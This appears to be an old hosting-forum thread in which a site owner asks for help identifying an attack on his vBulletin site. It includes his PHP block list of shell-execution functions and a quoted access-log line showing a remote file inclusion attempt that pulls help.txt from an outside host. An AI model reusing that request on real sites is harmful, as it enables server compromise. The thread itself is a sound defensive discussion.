check log i what is that hacking method

kuwaitnt

Well-Known Member
Oct 13, 2003
75
0
156
hello

i have strange hacking on my box

http://3zz.cc/iplog2.txt

that is log from my web site

it is on shared server with centos 4.4
iam run vbulletin last version

and server is well secure but i don't know what is this hacking method

can any one help us to prevent is


i know the hacker is get help.txt file from his web site

but i don't know where does he put thats file i have check my web site there are no suspension file i check the log i don't know also the name does he request to hack my web site

i think he can delete, read and change files and folders for my web site and i think he also can control my website from other web site on that server



notice :

iam use php4.4.4 with safe_mode and this disable_functions

phpinfo, mkdir, unlink, symlink, ini_restore, popen, pclose, system, exec, shell_exec, suExec, dl, passthru, pclose, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, leak, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, posix_getpwuid, escapeshellcmd, escapeshellarg, fpassthru, psockopen, cmd, backtick, virtual, pcntl_exec , ini_alter, parse_ini_file, show_source, apache_child_terminate, apache_get_modules , apache_get_version , apache_note, openlog, popens, filegetcontents, get_dir, dos_conv, myshellexec, get_current_user, php_uname, fileperms, filegroup, fileowner, getmyuid, getmygid

i have set allow_url_fopen to off

and php run with phpsuexec


i have installed mod_security with accunett rules or others rules i have add it

i have install rfx network LES

my system is centos 4.4 with cpanel current version



i know the person who try to hack me and i know he is get files to my website or other web site on my server then he try hacking
 

ramprage

Well-Known Member
Jul 21, 2002
655
0
166
Canada
Looks like a common attack on register_globals using a remote include.
Check your web.php file at the includet variable. It's probably not properly coded.

Sat Nov 25 16:21:16 2006 1 91.140.140.49 6038 /home/nokia3/pub62.150.187.89 - - [20/Nov/2006:15:55:14 +0300] "GET /web.php?inludet=http://www.arabdesing.com/help.txt? HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 

kuwaitnt

Well-Known Member
Oct 13, 2003
75
0
156
[email protected] [/tmp]# php -i | grep global
register_globals => Off => Off



it is off on that server

but iam unanderstand what is that


/home/nokia3/public_html/includes/init.php a _ i r nokia3 ftp 1 * c


there are some thing i think about chown or chmod files or some ftp issue ?


i realy unknow what he is try to do :(

as server is realy well secure but iam unanderstand what does he do
 

kuwaitnt

Well-Known Member
Oct 13, 2003
75
0
156
hello

for notice : i have set register_globals off and allow_url_fopen to off

when iam checking on domlog files i have notice

he have upload files via web in the past he upload encoded file in cgi-bin folder

and i need to know what is his method to hack my web sites !! so that i can prevent it

i think i will made mod_security rules for that request a _ i r nokia3 ftp 1 * c

but what about user name to how can i made it ??